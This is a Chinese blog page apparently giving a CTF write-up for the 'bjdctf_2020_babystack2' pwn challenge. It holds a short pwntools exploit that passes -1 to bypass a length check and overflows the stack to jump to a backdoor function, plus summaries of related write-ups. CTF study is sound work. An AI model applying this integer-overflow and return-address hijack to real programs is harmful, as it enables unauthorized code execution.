bjdctf 2020 babystack2

最新推荐文章于 2025-02-18 22:56:03 发布

原创最新推荐文章于 2025-02-18 22:56:03 发布 · 304 阅读

0 ·

CC 4.0 BY-SA版权

pwn 专栏收录该内容

38 篇文章

订阅专栏

from pwn import *
p = process('./bjdctf_2020_babystack2')
p.sendlineafter("length of your name:\n","-1")
payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726)
p.sendlineafter("name?\n",payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[BJDCTF 2020]babystack2.0 CTF-PWN

m0_72904009的博客

05-13

542

[BJDCTF 2020]babystack2.0 CTF-PWN

bjdctf_2020_babystack

最新发布

2301_80245691的博客

09-24

143

摘要：本文分析了64位程序bjdctf_2020_babystack的漏洞利用过程。程序使用scanf读取输入长度但未检查边界，导致栈溢出。通过IDA发现存在backdoor函数，构造payload（24字节填充+backdoor地址）实现溢出攻击。调试时发现需要输入IP才能继续执行，最终利用脚本成功获取flag。漏洞成因在于未验证输入长度的危险函数组合使用。

参与评论您还未登录，请先登录后发表或查看评论

【CTF】bjdctf_2020_babystack2

凉水的博客

06-30

761

bjdctf_2020_babystack2

m0sway的博客

04-04

500

bjdctf_2020_babystack2 WriteUp BUU_PWN

BJDCTF 2020 babystack2.0

2301_79793667的博客

12-11

793

因为第二次所需要读取的数值的字节数大于10，第一次输入的值在第二次作为无符号整型，所以我们需要输入一个负数来同时满足第一次输入和第二次输入，可以输入-1。通过分析，我们发现第一次输入的值不能大于10，否则会退出程序，第一次输入的值将作为第二次通过read函数输入的buf的值的最大字节数。让我们输入数据，随便输入了几个数据，就被退出程序了，那我们检查一下附件，然后用ida打开。通过read函数栈溢出到后门函数的地址0x400726。那我们就用64位ida打开。首先打开环境，并下载附件。找到了后门函数的地址。

buuctf-bjdctf_2020_babystack（pwn）

2301_81574836的博客

02-18

1011

buuctf-bjdctf_2020_babystack（pwn）题解

BJDCTF 2020 babystack

2301_79793667的博客

12-04

324

通过分析，我们发现第一次输入的值作为第二次通过read函数输入的buf的值的最大字节数。我们要通过read函数输入buf的值来溢出到backdoor的地址进而控制程序。然后进行nc连接，发现直接运行并没有什么头绪，而且程序还会断开链接。这时候就需要我们检查一下附件类型，然后用ida打开看一下程序运行。运行一下，发现可以与程序交互，并获得flag。发现有backdoor，并分析main函数。是64位文件，那我们就用64位ida打开。打开环境，并下载附件。

BUUCTF pwn——bjdctf_2020_babystack

CNS-Enterprise BCC-1701-J

03-31

443

BUUCTF 做题练习

【BUUCTF】bjdctf_2020_babystack2

m0_51251108的博客

12-30

396

【BUUCTF】bjdctf_2020_babystack2 64位，无canary 有后门函数这题思路就是用无符号和有符号整型来绕过10的比较比如：送入一个-1，无符号类型会把它看成一个很大的正整数，是，而有符号则认为是-1 这题size_t是一种无符号整型，下面被强转成有符号，最后又强转成无符号所以可以绕过 exp： from pwn import* r=remote('node3.buuoj.cn',29907) context.log_level = 'debug' backdoor=0

bjdctf_2020_babystack2【BUUCTF】

qq_41696518的博客

08-31

930

bjdctf_2020_babystack2【BUUCTF】

[BUUCTF]PWN——bjdctf_2020_babystack2

mcmuyanga的博客

11-03

803

bjdctf_2020_babystack2 附件步骤：例行检查，64位程序，开启了nx保护尝试运行一下程序，看看情况 64位ida载入，习惯性的先检索程序里的字符串，发现了bin/sh，双击跟进，找到了程序里的后门函数，backdoor=0x400726 从main函数开始看程序我们读入数据的大小由我们输入的参数nbytes控制，但是nbytes又不能大于10，这边注意到了nbytes参数的类型–>size_t 百度百科里对这个类型的解释是大概就是一个无符号整型，注意重点是无符

BUU刷题-Pwn-bjdctf_2020_babystack2

一个啥也不会的小菜鸡！

06-21

331

因此可以输入0x80000001=>2147483649，signed int类型被当做负数小于10，read函数中unsigned int类型被当成正整数2147483649。比较nbytes和10的大小，可以利用无符号整数溢出漏洞，输入一个负数，进而输入name的时候可以实现栈溢出跳转到后门函数getshell。nbytes是signed int类型，4字节，但后面read函数输入name时却是unsigned int类型。

BUUCTF：bjdctf_2020_babystack2（write up）

qq_44768749的博客

08-24

1753

BUUCTF：bjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序，开启了栈不可执行、部分RELRO保护 0x02 运行先输入name的长度，再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路比较nbytes和10的大小，可以利用符号溢出漏洞，输入一个负数，进而输入name的时候可以实现栈溢出跳转到后门函数ge

[BUUOJ]bjdctf_2020_babystack2

Do1phln的博客

10-25

267

checksec是64位小端序，IDA分析看没找到明显的输入溢出逻辑，但是找到了后门函数，再仔细观察发现数值里面有强制转换，有一部分从int转到了unsigned int，因此可以初步判定为整型溢出，如果我输入-1即可突破长度为10的限制，所以以此下手即可成功修改返回地址，getshell。

BUUCTF bjdctf_2020_babystack2

2401_88087539的博客

01-30

316

pwn新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正

[BUUCTF-pwn]——bjdctf_2020_babystack2

Y_peak的博客

02-22

293

[BUUCTF-pwn]——bjdctf_2020_babystack2 题目地址： https://buuoj.cn/challenges#bjdctf_2020_babystack2 先checksec一下在IDA中查看一下，注意想要栈溢出，首先需要nbytes足够大。size_t类型在标准C语言库中，是unsigned int类型， 64位 long unsigned int。而%d 是按照int类型读取的，我们读入-1。其实就相当于一个很大的数字，但是可以绕过检查。具体可以了解下整型溢出

buuctfbjdctf_2020_babystack2 1

03-19

### 关于 BUUCTF BJDCTF_2020 Babystack2 的解题思路 BABYSTACK2 是一道典型的 ROP（Return-Oriented Programming）题目，主要考察选手对栈溢出漏洞的理解以及如何利用返回地址控制程序执行流程的能力。以下是该...